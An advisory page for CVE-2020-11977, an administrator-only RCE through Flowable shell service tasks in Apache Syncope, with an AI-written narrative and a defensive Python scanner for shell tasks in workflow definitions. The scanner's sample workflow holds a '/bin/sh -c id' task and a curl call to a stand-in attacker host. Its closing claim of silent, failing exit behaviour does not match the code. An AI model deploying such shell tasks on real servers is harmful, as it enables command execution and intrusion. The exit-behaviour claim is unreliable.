VYPR
High severity · NVD Advisory · Published Sep 15, 2020 · Updated Aug 4, 2024

CVE-2020-11977

Description

Apache Syncope 2.1.x before 2.1.7 allows RCE via Shell Service Tasks in the Flowable workflow engine to administrators with workflow entitlements.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

CVE-2020-11977 is a remote code execution vulnerability in Apache Syncope 2.1.x prior to 2.1.7. It is reachable when the Flowable user-workflow extension is enabled: Flowable's BPMN dialect includes a Shell Service Task, a serviceTask of type "shell" that runs an operating-system command when a process instance reaches it, and Syncope did not stop such tasks from being part of a deployed workflow definition. An administrator who holds the workflow entitlements can therefore deploy a definition whose shell task executes arbitrary commands on the server, with the privileges of the Syncope server process [1][2].

Exploitation

Exploitation requires an authenticated administrator holding the workflow entitlements needed to create or modify workflow definitions; no other user interaction is involved. The attack surface is the workflow-definition management path into the Flowable engine, which accepts Shell Service Tasks without restriction. The administrator uploads a definition containing a shell serviceTask whose command and arguments are under their control; the command runs on the Syncope server whenever a workflow instance reaches that task, for example on the next user lifecycle operation handled by the user workflow [1][2]. Because the prerequisite is an already privileged Syncope account, the practical risk is an insider, or a compromised administrator credential, turning application-level administration into operating-system code execution.

Impact

Successful exploitation yields arbitrary command execution as the operating-system account that runs Syncope (typically the servlet container's user), so the attacker can read and write any file that account can reach, including Syncope's configuration and database credentials, and run further code of their choosing. That amounts to full compromise of the Syncope server and, since Syncope holds identity data and connector credentials for the systems it provisions, a starting point for data exfiltration, privilege escalation and lateral movement within the network [2].

Mitigation

The vulnerability is fixed in Apache Syncope 2.1.7; upgrade to that version or later. The advisory lists no workaround [1][2]. Until the upgrade is in place, exposure can be reduced with compensating controls: keep the workflow-definition entitlements on the smallest possible set of administrator accounts and protect those accounts accordingly, review the currently deployed workflow definitions for serviceTask elements of type "shell" that nobody intended, run Syncope under a least-privileged operating-system account, and treat any unexpected change to a workflow definition as a security event worth alerting on.
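One check a practitioner will want after reading the above, added here as an example and not code from Apache Syncope or from the advisory: a scanner for exported workflow definitions (BPMN 2.0 XML, the format in which Syncope stores Flowable workflows) that flags every serviceTask carrying flowable:type="shell" and reports the command and arguments it would run. The two BPMN documents embedded in the script are constructed for illustration; the Flowable namespace and the shell-task field names (command, arg1..argN, wait, outputVariable) follow Flowable's BPMN extension. A hit in a deployment still on 2.1.x before 2.1.7 is a finding to triage, and a command given as an expression rather than a literal (reported as None) deserves the same scrutiny; the only real fix remains the upgrade.

```python
"""Audit Syncope workflow definitions (BPMN 2.0 XML) for Flowable shell
service tasks, the construct abused in CVE-2020-11977.

Added example, not code from Apache Syncope or from the advisory. The BPMN
documents below are constructed; the Flowable namespace and the shell-task
field names (command, arg1..argN, wait, outputVariable) follow Flowable's
BPMN extension.
"""
import sys
import xml.etree.ElementTree as ET

BPMN_NS = "http://www.omg.org/spec/BPMN/20100524/MODEL"
FLOWABLE_NS = "http://flowable.org/bpmn"


def _field_value(field):
    """A Flowable <field> carries its value either as a stringValue
    attribute or as a nested <flowable:string> element; None if neither
    (e.g. the value is an expression)."""
    value = field.get("stringValue")
    if value is None:
        nested = field.find("{%s}string" % FLOWABLE_NS)
        if nested is not None:
            value = nested.text
    return value


def find_shell_tasks(bpmn_xml):
    """Return [(task id, command, [args])] for every serviceTask whose
    flowable:type attribute is "shell". command is None when it is not a
    literal, which still warrants review."""
    root = ET.fromstring(bpmn_xml)
    findings = []
    for task in root.iter("{%s}serviceTask" % BPMN_NS):
        if task.get("{%s}type" % FLOWABLE_NS) != "shell":
            continue
        command = None
        args = {}
        for field in task.iter("{%s}field" % FLOWABLE_NS):
            name = field.get("name", "")
            if name == "command":
                command = _field_value(field)
            elif name.startswith("arg") and name[3:].isdigit():
                args[int(name[3:])] = _field_value(field)
        findings.append((task.get("id"), command, [args[k] for k in sorted(args)]))
    return findings


def is_clean(bpmn_xml):
    """True when the definition contains no shell service task."""
    return not find_shell_tasks(bpmn_xml)


# Constructed sample: a definition an administrator with workflow
# entitlements could deploy on 2.1.x before 2.1.7. The second task uses the
# nested <flowable:string> form of the field value.
SHELL_BPMN = """<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL"
    xmlns:flowable="http://flowable.org/bpmn" targetNamespace="http://example.test">
  <process id="userWorkflow">
    <startEvent id="start"/>
    <serviceTask id="runShell" flowable:type="shell">
      <extensionElements>
        <flowable:field name="command" stringValue="/bin/sh"/>
        <flowable:field name="arg1" stringValue="-c"/>
        <flowable:field name="arg2" stringValue="id"/>
        <flowable:field name="wait" stringValue="true"/>
        <flowable:field name="outputVariable" stringValue="shellOut"/>
      </extensionElements>
    </serviceTask>
    <serviceTask id="runShell2" flowable:type="shell">
      <extensionElements>
        <flowable:field name="command"><flowable:string>/usr/bin/curl</flowable:string></flowable:field>
        <flowable:field name="arg1"><flowable:string>http://attacker.test/</flowable:string></flowable:field>
      </extensionElements>
    </serviceTask>
    <endEvent id="end"/>
  </process>
</definitions>"""

# Constructed sample: ordinary user task and delegate-based service task,
# nothing that spawns a process.
CLEAN_BPMN = """<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL"
    xmlns:flowable="http://flowable.org/bpmn" targetNamespace="http://example.test">
  <process id="userWorkflow">
    <startEvent id="start"/>
    <userTask id="approve" name="Approve" flowable:candidateGroups="admins"/>
    <serviceTask id="notify" flowable:delegateExpression="${notifier}"/>
    <endEvent id="end"/>
  </process>
</definitions>"""


def _read(path):
    with open(path, encoding="utf-8") as fh:
        return fh.read()


if __name__ == "__main__":
    # Pass exported definition files on the command line; with no
    # arguments the two constructed samples are scanned instead.
    sources = [(p, _read(p)) for p in sys.argv[1:]] or [
        ("SHELL_BPMN", SHELL_BPMN), ("CLEAN_BPMN", CLEAN_BPMN)]
    for label, document in sources:
        hits = find_shell_tasks(document)
        print("%s: %s" % (label, "clean" if not hits else "%d shell task(s)" % len(hits)))
        for task_id, command, args in hits:
            print("  serviceTask %s -> %s %s" % (task_id, command, " ".join(a or "?" for a in args)))
```

Export each workflow definition from the admin console or the REST API to a file and pass the paths on the command line; the exit is silent on success so the script can be wrapped in a cron job or CI check that fails when any hit is reported.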

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package: org.apache.syncope:syncope (Maven)
Affected versions: >= 2.1.0, < 2.1.7
Patched versions: 2.1.7

Affected products: 2

References: 3